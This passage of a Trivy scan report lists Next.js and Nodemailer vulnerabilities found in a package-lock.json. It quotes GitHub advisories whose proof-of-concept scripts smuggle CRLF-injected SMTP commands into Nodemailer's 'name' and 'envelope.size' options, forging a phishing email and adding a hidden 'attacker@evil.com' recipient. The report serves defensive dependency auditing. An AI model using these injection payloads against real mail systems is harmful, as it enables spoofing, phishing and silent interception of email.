15.5.16 and 16.2.5.
Severity: LOW
CweIDs: *id046
VendorSeverity:
ghsa: 1
nvd: 2
CVSS:
ghsa:
V3Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L
V3Score: 3.7
nvd:
V3Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H
V3Score: 5.9
References:
- https://github.com/vercel/next.js
- https://github.com/vercel/next.js/releases/tag/v15.5.16
- https://github.com/vercel/next.js/releases/tag/v16.2.5
- https://github.com/vercel/next.js/security/advisories/GHSA-3g8h-86w9-wvmq
- https://nvd.nist.gov/vuln/detail/CVE-2026-44572
PublishedDate: '2026-05-13T16:16:58.8Z'
LastModifiedDate: '2026-05-15T15:46:08.98Z'
context:
sbom:
name: next
version: 14.2.3
path: /package-lock.json
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 6.6688
epss: 8.0e-05
epss_percentile: 0.00741
is_kev: false
kev_due_date: null
components:
severity_score: 2
epss_multiplier: 1.00032
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: f3c2cbad0f8c4f0a
ruleId: CVE-2026-44582
severity: LOW
tool:
name: trivy
version: unknown
location:
path: package-lock.json
startLine: 0
message: Next.js vulnerable to cache poisoning via collisions in React Server Component
cache-busting
title: CVE-2026-44582
description: Next.js is a React framework for building full-stack web applications.
From 13.4.6 to before 15.5.16 and 16.2.5, React Server Component responses can
be vulnerable to cache poisoning in deployments that rely on shared caches with
insufficient response partitioning. In affected conditions, collisions in the
_rsc cache-busting value can allow an attacker to poison cache entries so users
receive the wrong response variant for a given URL. This vulnerability is fixed
in 15.5.16 and 16.2.5.
remediation: https://avd.aquasec.com/nvd/cve-2026-44582
references: []
tags:
- vulnerability
- pkg:next@14.2.3
risk:
cwe: &id047
- CWE-328
raw:
VulnerabilityID: CVE-2026-44582
VendorIDs:
- GHSA-vfv6-92ff-j949
PkgID: next@14.2.3
PkgName: next
PkgIdentifier:
PURL: pkg:npm/next@14.2.3
UID: 494c23d2c970c8b
InstalledVersion: 14.2.3
FixedVersion: 15.5.16, 16.2.5
Status: fixed
SeveritySource: ghsa
PrimaryURL: https://avd.aquasec.com/nvd/cve-2026-44582
DataSource:
ID: ghsa
Name: GitHub Security Advisory npm
URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm
Fingerprint: sha256:5355cf71971ed497dc9db80439cbc15aecaca5f44147444b410ea52d3870a09d
Title: Next.js vulnerable to cache poisoning via collisions in React Server Component
cache-busting
Description: Next.js is a React framework for building full-stack web applications.
From 13.4.6 to before 15.5.16 and 16.2.5, React Server Component responses can
be vulnerable to cache poisoning in deployments that rely on shared caches with
insufficient response partitioning. In affected conditions, collisions in the
_rsc cache-busting value can allow an attacker to poison cache entries so users
receive the wrong response variant for a given URL. This vulnerability is fixed
in 15.5.16 and 16.2.5.
Severity: LOW
CweIDs: *id047
VendorSeverity:
ghsa: 1
CVSS:
ghsa:
V3Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N
V3Score: 3.7
References:
- https://github.com/vercel/next.js
- https://github.com/vercel/next.js/releases/tag/v15.5.16
- https://github.com/vercel/next.js/releases/tag/v16.2.5
- https://github.com/vercel/next.js/security/advisories/GHSA-vfv6-92ff-j949
- https://nvd.nist.gov/vuln/detail/CVE-2026-44582
PublishedDate: '2026-05-13T18:16:19.037Z'
LastModifiedDate: '2026-05-14T18:15:03.26Z'
context:
sbom:
name: next
version: 14.2.3
path: /package-lock.json
compliance:
owaspTop10_2021:
- A02:2021
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 6.671999999999999
epss: 0.0002
epss_percentile: 0.05498
is_kev: false
kev_due_date: null
components:
severity_score: 2
epss_multiplier: 1.0008
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 44b697423f0e8861
ruleId: CVE-2025-14874
severity: HIGH
tool:
name: trivy
version: unknown
location:
path: package-lock.json
startLine: 0
message: 'nodemailer: Nodemailer: Denial of service via crafted email address header'
title: CVE-2025-14874
description: A flaw was found in Nodemailer. This vulnerability allows a denial
of service (DoS) via a crafted email address header that triggers infinite recursion
in the address parser.
remediation: https://avd.aquasec.com/nvd/cve-2025-14874
references: []
tags:
- vulnerability
- pkg:nodemailer@6.10.1
risk:
cwe: &id048
- CWE-703
raw:
VulnerabilityID: CVE-2025-14874
VendorIDs:
- GHSA-rcmh-qjqh-p98v
PkgID: nodemailer@6.10.1
PkgName: nodemailer
PkgIdentifier:
PURL: pkg:npm/nodemailer@6.10.1
UID: c243d03ecfce3c20
InstalledVersion: 6.10.1
FixedVersion: 7.0.11
Status: fixed
SeveritySource: ghsa
PrimaryURL: https://avd.aquasec.com/nvd/cve-2025-14874
DataSource:
ID: ghsa
Name: GitHub Security Advisory npm
URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm
Fingerprint: sha256:966cf7be028923c9a0026859ad211dbe6884c63fd7e0af1c79f4c19409cbe98a
Title: 'nodemailer: Nodemailer: Denial of service via crafted email address header'
Description: A flaw was found in Nodemailer. This vulnerability allows a denial
of service (DoS) via a crafted email address header that triggers infinite recursion
in the address parser.
Severity: HIGH
CweIDs: *id048
VendorSeverity:
ghsa: 3
nvd: 3
redhat: 2
CVSS:
ghsa:
V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
V3Score: 7.5
nvd:
V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
V3Score: 7.5
redhat:
V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
V3Score: 7.5
References:
- https://access.redhat.com/security/cve/CVE-2025-14874
- https://bugzilla.redhat.com/show_bug.cgi?id=2418133
- https://github.com/nodemailer/nodemailer
- https://github.com/nodemailer/nodemailer/commit/b61b9c0cfd682b6f647754ca338373b68336a150
- https://github.com/nodemailer/nodemailer/security/advisories/GHSA-rcmh-qjqh-p98v
- https://nvd.nist.gov/vuln/detail/CVE-2025-14874
- https://www.cve.org/CVERecord?id=CVE-2025-14874
PublishedDate: '2025-12-18T09:15:44.87Z'
LastModifiedDate: '2026-01-08T03:15:43.19Z'
context:
sbom:
name: nodemailer
version: 6.10.1
path: /package-lock.json
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 23.477999999999998
epss: 0.00155
epss_percentile: 0.3573
is_kev: false
kev_due_date: null
components:
severity_score: 7
epss_multiplier: 1.0062
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 8c54dd19fd34e976
ruleId: CVE-2025-13033
severity: MEDIUM
tool:
name: trivy
version: unknown
location:
path: package-lock.json
startLine: 0
message: 'nodemailer: Nodemailer: Email to an unintended domain can occur due to
Interpretation Conflict'
title: CVE-2025-13033
description: A vulnerability was identified in the email parsing library due to
improper handling of specially formatted recipient email addresses. An attacker
can exploit this flaw by crafting a recipient address that embeds an external
address within quotes. This causes the application to misdirect the email to the
attacker's external address instead of the intended internal recipient. This could
lead to a significant data leak of sensitive information and allow an attacker
to bypass security filters and access controls.
remediation: https://avd.aquasec.com/nvd/cve-2025-13033
references: []
tags:
- vulnerability
- pkg:nodemailer@6.10.1
risk:
cwe: &id049
- CWE-1286
raw:
VulnerabilityID: CVE-2025-13033
VendorIDs:
- GHSA-mm7p-fcc7-pg87
PkgID: nodemailer@6.10.1
PkgName: nodemailer
PkgIdentifier:
PURL: pkg:npm/nodemailer@6.10.1
UID: c243d03ecfce3c20
InstalledVersion: 6.10.1
FixedVersion: 7.0.7
Status: fixed
SeveritySource: ghsa
PrimaryURL: https://avd.aquasec.com/nvd/cve-2025-13033
DataSource:
ID: ghsa
Name: GitHub Security Advisory npm
URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm
Fingerprint: sha256:718ace41991afee3a924eee3b40006635632701df5e1f2e2afabf15077a6d79b
Title: 'nodemailer: Nodemailer: Email to an unintended domain can occur due to
Interpretation Conflict'
Description: A vulnerability was identified in the email parsing library due to
improper handling of specially formatted recipient email addresses. An attacker
can exploit this flaw by crafting a recipient address that embeds an external
address within quotes. This causes the application to misdirect the email to
the attacker's external address instead of the intended internal recipient.
This could lead to a significant data leak of sensitive information and allow
an attacker to bypass security filters and access controls.
Severity: MEDIUM
CweIDs: *id049
VendorSeverity:
ghsa: 2
redhat: 2
CVSS:
ghsa:
V40Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P
V40Score: 5.5
redhat:
V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
V3Score: 7.5
References:
- https://access.redhat.com/errata/RHSA-2026:15979
- https://access.redhat.com/errata/RHSA-2026:3751
- https://access.redhat.com/security/cve/CVE-2025-13033
- https://bugzilla.redhat.com/show_bug.cgi?id=2402179
- https://github.com/nodemailer/nodemailer
- https://github.com/nodemailer/nodemailer/commit/1150d99fba77280df2cfb1885c43df23109a8626
- https://github.com/nodemailer/nodemailer/security/advisories/GHSA-mm7p-fcc7-pg87
- https://nvd.nist.gov/vuln/detail/CVE-2025-13033
- https://www.cve.org/CVERecord?id=CVE-2025-13033
PublishedDate: '2025-11-14T20:15:45.957Z'
LastModifiedDate: '2026-05-11T13:16:10.037Z'
context:
sbom:
name: nodemailer
version: 6.10.1
path: /package-lock.json
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 13.349866666666665
epss: 0.00031
epss_percentile: 0.0896
is_kev: false
kev_due_date: null
components:
severity_score: 4
epss_multiplier: 1.00124
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 314c4b93bbc126bb
ruleId: GHSA-vvjj-xcjg-gr5g
severity: MEDIUM
tool:
name: trivy
version: unknown
location:
path: package-lock.json
startLine: 0
message: 'Nodemailer Vulnerable to SMTP Command Injection via CRLF in Transport
name Option (EHLO/HELO) '
title: GHSA-vvjj-xcjg-gr5g
description: "### Summary\n\nNodemailer versions up to and including 8.0.4 are vulnerable\
\ to SMTP command injection via CRLF sequences in the transport `name` configuration\
\ option. The `name` value is used directly in the EHLO/HELO SMTP command without\
\ any sanitization for carriage return and line feed characters (`\\r\\n`). An\
\ attacker who can influence this option can inject arbitrary SMTP commands, enabling\
\ unauthorized email sending, email spoofing, and phishing attacks.\n\n### Details\n\
\nThe vulnerability exists in `lib/smtp-connection/index.js`. When establishing\
\ an SMTP connection, the `name` option is concatenated directly into the EHLO\
\ command:\n\n```javascript\n// lib/smtp-connection/index.js, line 71\nthis.name\
\ = this.options.name || this._getHostname();\n\n// line 1336\nthis._sendCommand('EHLO\
\ ' + this.name);\n```\n\nThe `_sendCommand` method writes the string directly\
\ to the socket followed by `\\r\\n` (line 1082):\n\n```javascript\nthis._socket.write(Buffer.from(str\
\ + '\\r\\n', 'utf-8'));\n```\n\nIf the `name` option contains `\\r\\n` sequences,\
\ each injected line is interpreted by the SMTP server as a separate command.\
\ Unlike the `envelope.from` and `envelope.to` fields which are validated for\
\ `\\r\\n` (line 1107-1119), and unlike `envelope.size` which was recently fixed\
\ (GHSA-c7w3-x93f-qmm8) by casting to a number, the `name` parameter receives\
\ no CRLF sanitization whatsoever.\n\nThis is distinct from the previously reported\
\ GHSA-c7w3-x93f-qmm8 (envelope.size injection) as it affects a different parameter\
\ (`name` vs `size`), uses a different injection point (EHLO command vs MAIL FROM\
\ command), and occurs at connection initialization rather than during message\
\ sending.\n\nThe `name` option is also used in HELO (line 1384) and LHLO (line\
\ 1333) commands with the same lack of sanitization.\n\n### PoC\n\n```javascript\n\
const nodemailer = require('nodemailer');\nconst net = require('net');\n\n// Simple\
\ SMTP server to observe injected commands\nconst server = net.createServer(socket\
\ => {\n socket.write('220 test ESMTP\\r\\n');\n socket.on('data', data\
\ => {\n const lines = data.toString().split('\\r\\n').filter(l => l);\n\
\ lines.forEach(line => {\n console.log('SMTP CMD:', line);\n\
\ if (line.startsWith('EHLO') || line.startsWith('HELO'))\n \
\ socket.write('250 OK\\r\\n');\n else if (line.startsWith('MAIL\
\ FROM'))\n socket.write('250 OK\\r\\n');\n else if\
\ (line.startsWith('RCPT TO'))\n socket.write('250 OK\\r\\n');\n\
\ else if (line === 'DATA')\n socket.write('354 Go\\\
r\\n');\n else if (line === '.')\n socket.write('250\
\ OK\\r\\n');\n else if (line === 'QUIT')\n { socket.write('221\
\ Bye\\r\\n'); socket.end(); }\n else if (line === 'RSET')\n \
\ socket.write('250 OK\\r\\n');\n });\n });\n});\n\nserver.listen(0,\
\ '127.0.0.1', () => {\n const port = server.address().port;\n\n // Inject\
\ a complete phishing email via EHLO name\n const transport = nodemailer.createTransport({\n\
\ host: '127.0.0.1',\n port: port,\n secure: false,\n \
\ name: 'legit.host\\r\\nMAIL FROM:<attacker@evil.com>\\r\\n'\n \
\ + 'RCPT TO:<victim@target.com>\\r\\nDATA\\r\\n'\n + 'From: ceo@company.com\\\
r\\nTo: victim@target.com\\r\\n'\n + 'Subject: Urgent\\r\\n\\r\\nPhishing\
\ content\\r\\n.\\r\\nRSET'\n });\n\n transport.sendMail({\n from:\
\ 'legit@example.com',\n to: 'legit-recipient@example.com',\n subject:\
\ 'Normal email',\n text: 'Normal content'\n }, () => { server.close();\
\ process.exit(0); });\n});\n```\n\nRunning this PoC shows the SMTP server receives\
\ the injected MAIL FROM, RCPT TO, DATA, and phishing email content as separate\
\ SMTP commands before the legitimate email is sent.\n\n### Impact\n\n**Who is\
\ affected:** Applications that allow users or external input to configure the\
\ `name` SMTP transport option. This includes:\n- Multi-tenant SaaS platforms\
\ with per-tenant SMTP configuration\n- Admin panels where SMTP hostname/name\
\ settings are stored in databases\n- Applications loading SMTP config from environment\
\ variables or external sources\n\n**What can an attacker do:**\n1. **Send unauthorized\
\ emails** to arbitrary recipients by injecting MAIL FROM and RCPT TO commands\n\
2. **Spoof email senders** by injecting arbitrary From headers in the DATA portion\n\
3. **Conduct phishing attacks** using the legitimate SMTP server as a relay\n\
4. **Bypass application-level controls** on email recipients, since the injected\
\ commands are processed before the application's intended MAIL FROM/RCPT TO\n\
5. **Perform SMTP reconnaissance** by injecting commands like VRFY or EXPN\n\n\
The injection occurs at the EHLO stage (before authentication in most SMTP flows),\
\ making it particularly dangerous as the injected commands may be processed with\
\ the server's trust context.\n\n**Recommended fix:** Sanitize the `name` option\
\ by stripping or rejecting CRLF sequences, similar to how `envelope.from` and\
\ `envelope.to` are already validated on lines 1107-1119 of `lib/smtp-connection/index.js`.\
\ For example:\n\n```javascript\nthis.name = (this.options.name || this._getHostname()).replace(/[\\\
r\\n]/g, '');\n```"
remediation: https://github.com/advisories/GHSA-vvjj-xcjg-gr5g
references: []
tags:
- vulnerability
- pkg:nodemailer@6.10.1
raw:
VulnerabilityID: GHSA-vvjj-xcjg-gr5g
PkgID: nodemailer@6.10.1
PkgName: nodemailer
PkgIdentifier:
PURL: pkg:npm/nodemailer@6.10.1
UID: c243d03ecfce3c20
InstalledVersion: 6.10.1
FixedVersion: 8.0.5
Status: fixed
SeveritySource: ghsa
PrimaryURL: https://github.com/advisories/GHSA-vvjj-xcjg-gr5g
DataSource:
ID: ghsa
Name: GitHub Security Advisory npm
URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm
Fingerprint: sha256:17380daa219fcd2acb5ff13abdf591be99d5ba1498a2e827b85876cb23d42d77
Title: 'Nodemailer Vulnerable to SMTP Command Injection via CRLF in Transport
name Option (EHLO/HELO) '
Description: "### Summary\n\nNodemailer versions up to and including 8.0.4 are\
\ vulnerable to SMTP command injection via CRLF sequences in the transport `name`\
\ configuration option. The `name` value is used directly in the EHLO/HELO SMTP\
\ command without any sanitization for carriage return and line feed characters\
\ (`\\r\\n`). An attacker who can influence this option can inject arbitrary\
\ SMTP commands, enabling unauthorized email sending, email spoofing, and phishing\
\ attacks.\n\n### Details\n\nThe vulnerability exists in `lib/smtp-connection/index.js`.\
\ When establishing an SMTP connection, the `name` option is concatenated directly\
\ into the EHLO command:\n\n```javascript\n// lib/smtp-connection/index.js,\
\ line 71\nthis.name = this.options.name || this._getHostname();\n\n// line\
\ 1336\nthis._sendCommand('EHLO ' + this.name);\n```\n\nThe `_sendCommand` method\
\ writes the string directly to the socket followed by `\\r\\n` (line 1082):\n\
\n```javascript\nthis._socket.write(Buffer.from(str + '\\r\\n', 'utf-8'));\n\
```\n\nIf the `name` option contains `\\r\\n` sequences, each injected line\
\ is interpreted by the SMTP server as a separate command. Unlike the `envelope.from`\
\ and `envelope.to` fields which are validated for `\\r\\n` (line 1107-1119),\
\ and unlike `envelope.size` which was recently fixed (GHSA-c7w3-x93f-qmm8)\
\ by casting to a number, the `name` parameter receives no CRLF sanitization\
\ whatsoever.\n\nThis is distinct from the previously reported GHSA-c7w3-x93f-qmm8\
\ (envelope.size injection) as it affects a different parameter (`name` vs `size`),\
\ uses a different injection point (EHLO command vs MAIL FROM command), and\
\ occurs at connection initialization rather than during message sending.\n\n\
The `name` option is also used in HELO (line 1384) and LHLO (line 1333) commands\
\ with the same lack of sanitization.\n\n### PoC\n\n```javascript\nconst nodemailer\
\ = require('nodemailer');\nconst net = require('net');\n\n// Simple SMTP server\
\ to observe injected commands\nconst server = net.createServer(socket => {\n\
\ socket.write('220 test ESMTP\\r\\n');\n socket.on('data', data => {\n\
\ const lines = data.toString().split('\\r\\n').filter(l => l);\n \
\ lines.forEach(line => {\n console.log('SMTP CMD:', line);\n\
\ if (line.startsWith('EHLO') || line.startsWith('HELO'))\n \
\ socket.write('250 OK\\r\\n');\n else if (line.startsWith('MAIL\
\ FROM'))\n socket.write('250 OK\\r\\n');\n else if\
\ (line.startsWith('RCPT TO'))\n socket.write('250 OK\\r\\n');\n\
\ else if (line === 'DATA')\n socket.write('354 Go\\\
r\\n');\n else if (line === '.')\n socket.write('250\
\ OK\\r\\n');\n else if (line === 'QUIT')\n { socket.write('221\
\ Bye\\r\\n'); socket.end(); }\n else if (line === 'RSET')\n \
\ socket.write('250 OK\\r\\n');\n });\n });\n});\n\nserver.listen(0,\
\ '127.0.0.1', () => {\n const port = server.address().port;\n\n // Inject\
\ a complete phishing email via EHLO name\n const transport = nodemailer.createTransport({\n\
\ host: '127.0.0.1',\n port: port,\n secure: false,\n \
\ name: 'legit.host\\r\\nMAIL FROM:<attacker@evil.com>\\r\\n'\n \
\ + 'RCPT TO:<victim@target.com>\\r\\nDATA\\r\\n'\n + 'From:\
\ ceo@company.com\\r\\nTo: victim@target.com\\r\\n'\n + 'Subject:\
\ Urgent\\r\\n\\r\\nPhishing content\\r\\n.\\r\\nRSET'\n });\n\n transport.sendMail({\n\
\ from: 'legit@example.com',\n to: 'legit-recipient@example.com',\n\
\ subject: 'Normal email',\n text: 'Normal content'\n }, ()\
\ => { server.close(); process.exit(0); });\n});\n```\n\nRunning this PoC shows\
\ the SMTP server receives the injected MAIL FROM, RCPT TO, DATA, and phishing\
\ email content as separate SMTP commands before the legitimate email is sent.\n\
\n### Impact\n\n**Who is affected:** Applications that allow users or external\
\ input to configure the `name` SMTP transport option. This includes:\n- Multi-tenant\
\ SaaS platforms with per-tenant SMTP configuration\n- Admin panels where SMTP\
\ hostname/name settings are stored in databases\n- Applications loading SMTP\
\ config from environment variables or external sources\n\n**What can an attacker\
\ do:**\n1. **Send unauthorized emails** to arbitrary recipients by injecting\
\ MAIL FROM and RCPT TO commands\n2. **Spoof email senders** by injecting arbitrary\
\ From headers in the DATA portion\n3. **Conduct phishing attacks** using the\
\ legitimate SMTP server as a relay\n4. **Bypass application-level controls**\
\ on email recipients, since the injected commands are processed before the\
\ application's intended MAIL FROM/RCPT TO\n5. **Perform SMTP reconnaissance**\
\ by injecting commands like VRFY or EXPN\n\nThe injection occurs at the EHLO\
\ stage (before authentication in most SMTP flows), making it particularly dangerous\
\ as the injected commands may be processed with the server's trust context.\n\
\n**Recommended fix:** Sanitize the `name` option by stripping or rejecting\
\ CRLF sequences, similar to how `envelope.from` and `envelope.to` are already\
\ validated on lines 1107-1119 of `lib/smtp-connection/index.js`. For example:\n\
\n```javascript\nthis.name = (this.options.name || this._getHostname()).replace(/[\\\
r\\n]/g, '');\n```"
Severity: MEDIUM
VendorSeverity:
ghsa: 2
CVSS:
ghsa:
V3Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:N
V3Score: 4.9
References:
- https://github.com/nodemailer/nodemailer
- https://github.com/nodemailer/nodemailer/commit/0a43876801a420ca528f492eaa01bfc421cc306e
- https://github.com/nodemailer/nodemailer/releases/tag/v8.0.5
- https://github.com/nodemailer/nodemailer/security/advisories/GHSA-vvjj-xcjg-gr5g
PublishedDate: '2026-04-08T15:05:20Z'
LastModifiedDate: '2026-04-08T15:05:20Z'
context:
sbom:
name: nodemailer
version: 6.10.1
path: /package-lock.json
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 13.333333333333332
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 4
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 17548d349adde40e
ruleId: GHSA-c7w3-x93f-qmm8
severity: LOW
tool:
name: trivy
version: unknown
location:
path: package-lock.json
startLine: 0
message: Nodemailer has SMTP command injection due to unsanitized `envelope.size`
parameter
title: GHSA-c7w3-x93f-qmm8
description: "### Summary\nWhen a custom `envelope` object is passed to `sendMail()`\
\ with a `size` property containing CRLF characters (`\\r\\n`), the value is concatenated\
\ directly into the SMTP `MAIL FROM` command without sanitization. This allows\
\ injection of arbitrary SMTP commands, including `RCPT TO` \u2014 silently adding\
\ attacker-controlled recipients to outgoing emails.\n\n\n### Details\nIn `lib/smtp-connection/index.js`\
\ (lines 1161-1162), the `envelope.size` value is concatenated into the SMTP `MAIL\
\ FROM` command without any CRLF sanitization:\n\n```javascript\nif (this._envelope.size\
\ && this._supportedExtensions.includes('SIZE')) {\n args.push('SIZE=' + this._envelope.size);\n\
}\n```\n\nThis contrasts with other envelope parameters in the same function that\
\ ARE properly sanitized:\n- **Addresses** (`from`, `to`): validated for `[\\\
r\\n<>]` at lines 1107-1127\n- **DSN parameters** (`dsn.ret`, `dsn.envid`, `dsn.orcpt`):\
\ encoded via `encodeXText()` at lines 1167-1183\n\nThe `size` property reaches\
\ this code path through `MimeNode.setEnvelope()` in `lib/mime-node/index.js`\
\ (lines 854-858), which copies all non-standard envelope properties verbatim:\n\
\n```javascript\nconst standardFields = ['to', 'cc', 'bcc', 'from'];\nObject.keys(envelope).forEach(key\
\ => {\n if (!standardFields.includes(key)) {\n this._envelope[key]\
\ = envelope[key];\n }\n});\n```\n\nSince `_sendCommand()` writes the command\
\ string followed by `\\r\\n` to the raw TCP socket, a CRLF in the `size` value\
\ terminates the `MAIL FROM` command and starts a new SMTP command.\n\nNote: by\
\ default, Nodemailer constructs the envelope automatically from the message's\
\ `from`/`to` fields and does not include `size`. This vulnerability requires\
\ the application to explicitly pass a custom `envelope` object with a `size`\
\ property to `sendMail()`. \nWhile this limits the attack surface, applications\
\ that expose envelope configuration to users are affected.\n\n### PoC\nave the\
\ following as `poc.js` and run with `node poc.js`:\n\n```javascript\nconst net\
\ = require('net');\nconst nodemailer = require('nodemailer');\n\n// Minimal SMTP\
\ server that logs raw commands\nconst server = net.createServer(socket => {\n\
\ socket.write('220 localhost ESMTP\\r\\n');\n let buffer = '';\n socket.on('data',\
\ chunk => {\n buffer += chunk.toString();\n const lines = buffer.split('\\\
r\\n');\n buffer = lines.pop();\n for (const line of lines) {\n\
\ if (!line) continue;\n console.log('C:', line);\n \
\ if (line.startsWith('EHLO')) {\n socket.write('250-localhost\\\
r\\n250-SIZE 10485760\\r\\n250 OK\\r\\n');\n } else if (line.startsWith('MAIL\
\ FROM')) {\n socket.write('250 OK\\r\\n');\n } else\
\ if (line.startsWith('RCPT TO')) {\n socket.write('250 OK\\r\\\
n');\n } else if (line === 'DATA') {\n socket.write('354\
\ Start\\r\\n');\n } else if (line === '.') {\n socket.write('250\
\ OK\\r\\n');\n } else if (line.startsWith('QUIT')) {\n \
\ socket.write('221 Bye\\r\\n');\n socket.end();\n \
\ }\n }\n });\n});\n\nserver.listen(0, '127.0.0.1', () => {\n \
\ const port = server.address().port;\n console.log('SMTP server on port',\
\ port);\n console.log('Sending email with injected RCPT TO...\\n');\n\n \
\ const transporter = nodemailer.createTransport({\n host: '127.0.0.1',\n\
\ port,\n secure: false,\n tls: { rejectUnauthorized: false\
\ },\n });\n\n transporter.sendMail({\n from: 'sender@example.com',\n\
\ to: 'recipient@example.com',\n subject: 'Normal email',\n \
\ text: 'This is a normal email.',\n envelope: {\n from:\
\ 'sender@example.com',\n to: ['recipient@example.com'],\n \
\ size: '100\\r\\nRCPT TO:<attacker@evil.com>',\n },\n }, (err) =>\
\ {\n if (err) console.error('Error:', err.message);\n console.log('\\\
nExpected output above:');\n console.log(' C: MAIL FROM:<sender@example.com>\
\ SIZE=100');\n console.log(' C: RCPT TO:<attacker@evil.com> <--\
\ INJECTED');\n console.log(' C: RCPT TO:<recipient@example.com>');\n\
\ server.close();\n transporter.close();\n });\n});\n```\n\n\
**Expected output:**\n```\nSMTP server on port 12345\nSending email with injected\
\ RCPT TO...\n\nC: EHLO [127.0.0.1]\nC: MAIL FROM:<sender@example.com> SIZE=100\n\
C: RCPT TO:<attacker@evil.com>\nC: RCPT TO:<recipient@example.com>\nC: DATA\n\
...\nC: .\nC: QUIT\n```\n\nThe `RCPT TO:<attacker@evil.com>` line is injected\
\ by the CRLF in the `size` field, silently adding an extra recipient to the email.\n\
\n### Impact\nThis is an SMTP command injection vulnerability. An attacker who\
\ can influence the `envelope.size` property in a `sendMail()` call can:\n\n-\
\ **Silently add hidden recipients** to outgoing emails via injected `RCPT TO`\
\ commands, receiving copies of all emails sent through the affected transport\n\
- **Inject arbitrary SMTP commands** (e.g., `RSET`, additional `MAIL FROM` to\
\ send entirely separate emails through the server)\n- **Leverage the sending\
\ organization's SMTP server reputation** for spam or phishing delivery\n\nThe\
\ severity is mitigated by the fact that the `envelope` object must be explicitly\
\ provided by the application. Nodemailer's default envelope construction from\
\ message headers does not include `size`. Applications that pass through user-controlled\
\ data to the envelope options (e.g., via API parameters, admin panels, or template\
\ configurations) are vulnerable.\n\nAffected versions: at least v8.0.3 (current);\
\ likely all versions where `envelope.size` is supported."
remediation: https://github.com/advisories/GHSA-c7w3-x93f-qmm8
references: []
tags:
- vulnerability
- pkg:nodemailer@6.10.1
raw:
VulnerabilityID: GHSA-c7w3-x93f-qmm8
PkgID: nodemailer@6.10.1
PkgName: nodemailer
PkgIdentifier:
PURL: pkg:npm/nodemailer@6.10.1
UID: c243d03ecfce3c20
InstalledVersion: 6.10.1
FixedVersion: 8.0.4
Status: fixed
SeveritySource: ghsa
PrimaryURL: https://github.com/advisories/GHSA-c7w3-x93f-qmm8
DataSource:
ID: ghsa
Name: GitHub Security Advisory npm
URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm
Fingerprint: sha256:db7b269ba78fc172252ce3cd328867fff8504078f310f34689e0690febfd1a1e
Title: Nodemailer has SMTP command injection due to unsanitized `envelope.size`
parameter
Description: "### Summary\nWhen a custom `envelope` object is passed to `sendMail()`\
\ with a `size` property containing CRLF characters (`\\r\\n`), the value is\
\ concatenated directly into the SMTP `MAIL FROM` command without sanitization.\
\ This allows injection of arbitrary SMTP commands, including `RCPT TO` \u2014\
\ silently adding attacker-controlled recipients to outgoing emails.\n\n\n###\
\ Details\nIn `lib/smtp-connection/index.js` (lines 1161-1162), the `envelope.size`\
\ value is concatenated into the SMTP `MAIL FROM` command without any CRLF sanitization:\n\
\n```javascript\nif (this._envelope.size && this._supportedExtensions.includes('SIZE'))\
\ {\n args.push('SIZE=' + this._envelope.size);\n}\n```\n\nThis contrasts\
\ with other envelope parameters in the same function that ARE properly sanitized:\n\
- **Addresses** (`from`, `to`): validated for `[\\r\\n<>]` at lines 1107-1127\n\
- **DSN parameters** (`dsn.ret`, `dsn.envid`, `dsn.orcpt`): encoded via `encodeXText()`\
\ at lines 1167-1183\n\nThe `size` property reaches this code path through `MimeNode.setEnvelope()`\
\ in `lib/mime-node/index.js` (lines 854-858), which copies all non-standard\
\ envelope properties verbatim:\n\n```javascript\nconst standardFields = ['to',\
\ 'cc', 'bcc', 'from'];\nObject.keys(envelope).forEach(key => {\n if (!standardFields.includes(key))\
\ {\n this._envelope[key] = envelope[key];\n }\n});\n```\n\nSince\
\ `_sendCommand()` writes the command string followed by `\\r\\n` to the raw\
\ TCP socket, a CRLF in the `size` value terminates the `MAIL FROM` command\
\ and starts a new SMTP command.\n\nNote: by default, Nodemailer constructs\
\ the envelope automatically from the message's `from`/`to` fields and does\
\ not include `size`. This vulnerability requires the application to explicitly\
\ pass a custom `envelope` object with a `size` property to `sendMail()`. \n\
While this limits the attack surface, applications that expose envelope configuration\
\ to users are affected.\n\n### PoC\nave the following as `poc.js` and run with\
\ `node poc.js`:\n\n```javascript\nconst net = require('net');\nconst nodemailer\
